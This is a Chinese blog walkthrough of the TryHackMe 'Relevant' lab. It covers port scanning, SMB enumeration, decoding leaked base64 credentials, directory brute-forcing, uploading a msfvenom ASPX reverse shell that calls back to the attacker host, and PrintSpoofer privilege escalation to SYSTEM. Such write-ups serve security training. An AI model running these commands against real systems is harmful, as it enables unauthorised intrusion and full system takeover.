freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

tryhackme-Relevant
风起云涌123 2023-06-27 09:41:55 116921
所属地 北京

1.端口扫描

nmap -p1-65535 --min-rate=5000 10.10.101.177

1687575944_64965d88f280f4d9fbd58.png!small

主机开放了80,135,139,445,3389,5985,49663,49667,49669端口,进一步使用nmapsVsC参数获取详细信息和可利用的漏洞。

nmap -sV -sC -p80,135,139,445,3389,5985,49663,49667,49669 10.10.101.177

1687575950_64965d8eee79a635cc413.png!small

1687575956_64965d941bd6c6ae758d6.png!small

2.枚举

我们列出SMB共享,如下所示

smbclient -L 10.10.101.177

1687575963_64965d9b2e16c9c0aa240.png!small

我们发现SMB服务器上有一个名为nt4wrksv的共享磁盘,我们将尝试连接以进一步枚举它

1687575968_64965da0107ac926fac90.png!small

查看该磁盘的内容

1687575973_64965da52654eef81f90b.png!small

我们发现存在passwords.txt的文件,将其下载下来并进行查看

1687575978_64965daa23ed09da1b488.png!small

使用base64解码

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d

echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d

1687575983_64965daf44930d25df105.png!small

获取到2组账号和密码,我们使用这2组账号密码进行3389登录,但是失败了。

重新查看nmap的扫描结果,发现49663端口存在一个IIS服务,使用gobuster进行暴力破解实现目录发现,只显示响应码为200301的目录,设置线程为50

gobuster dir -u http://10.10.101.177:49663/-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,301' -t 50

1687575988_64965db4a3e47553908e1.png!small

我们发现存在/nt4wksv目录,和SMB服务器的/nt4wksv目录相同,访问http://10.10.101.177:49663/nt4wrksv/passwords.txt

1687575993_64965db96bf0b0f9d7bc0.png!small

SMB服务器中nt4wksv目录下的文件相同。因此接下来的漏洞利用思路很明确了,通过SMB服务器上传aspx木马获取反向shell

3.漏洞利用

利用msfvenom生成aspx木马.

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.5.241 lport=4433 -f aspx >1.aspx

1687575998_64965dbe4a75929d47e20.png!small

使用smbclient上传文件1.aspx(靶机ip有变化,是因为重启了靶机),

1687576002_64965dc2ccbf141b01bfd.png!small

curl http://10.10.8.87:49663/nt4wrksv/1.aspx,成功获取反向shell

1687576007_64965dc7e770efc4471de.png!small

获取到user.txt

1687576012_64965dccd300d9fd9c400.png!small

4.权限提升

运行“whoami /priv”命令查看当前用户在系统中的权限:

1687582012_6496753caa4322f26ecad.png!small

当前用户似乎启用了 SeImpersonatePrivilege 令牌,这意味着令牌模拟可用于升级权限。

尽管 Juicy Potato 通常用于利用令牌模拟,但这只有在服务器上启用 DCOM 时才有效。一个很好的替代方案是PrintSpoofer漏洞利用。

下面介绍PrintSpoofer漏洞的三种利用方式进行提权

方法一:

使用meterpreter进行提权

1687582017_64967541cf653b1a2445d.png!small

获取root.txt

1687582022_6496754621a7944f54730.png!small

方法二:

下载PrintSpoofer64.exe载荷

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

开启smbserver服务

smbserver.py a /root

在靶机上执行

\\10.10.169.251\a\PrintSpoofer64.exe

1687582027_6496754be71d61b004a16.png!small

方法三:

直接上传到靶机上

1687582032_649675508163ba3464bed.png!small

在靶机上执行

PrintSpoofer64.exe -i -c cmd

1687582038_64967556381f705133aa8.png!small

# 渗透测试 # 网络安全 # web安全 # 系统安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 风起云涌123 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
渗透测试技术分享
风起云涌123 LV.5
安全研究员,拥有CRTO证书
  • 22 文章数
  • 10 关注者
基于deepseek本地大模型的敏感信息检测的burp插件开发
2025-02-06
tomcat takeover靶场实战
2024-07-11
CRTO(Certified Red Team Operator )课程和认证经验分享
2024-01-01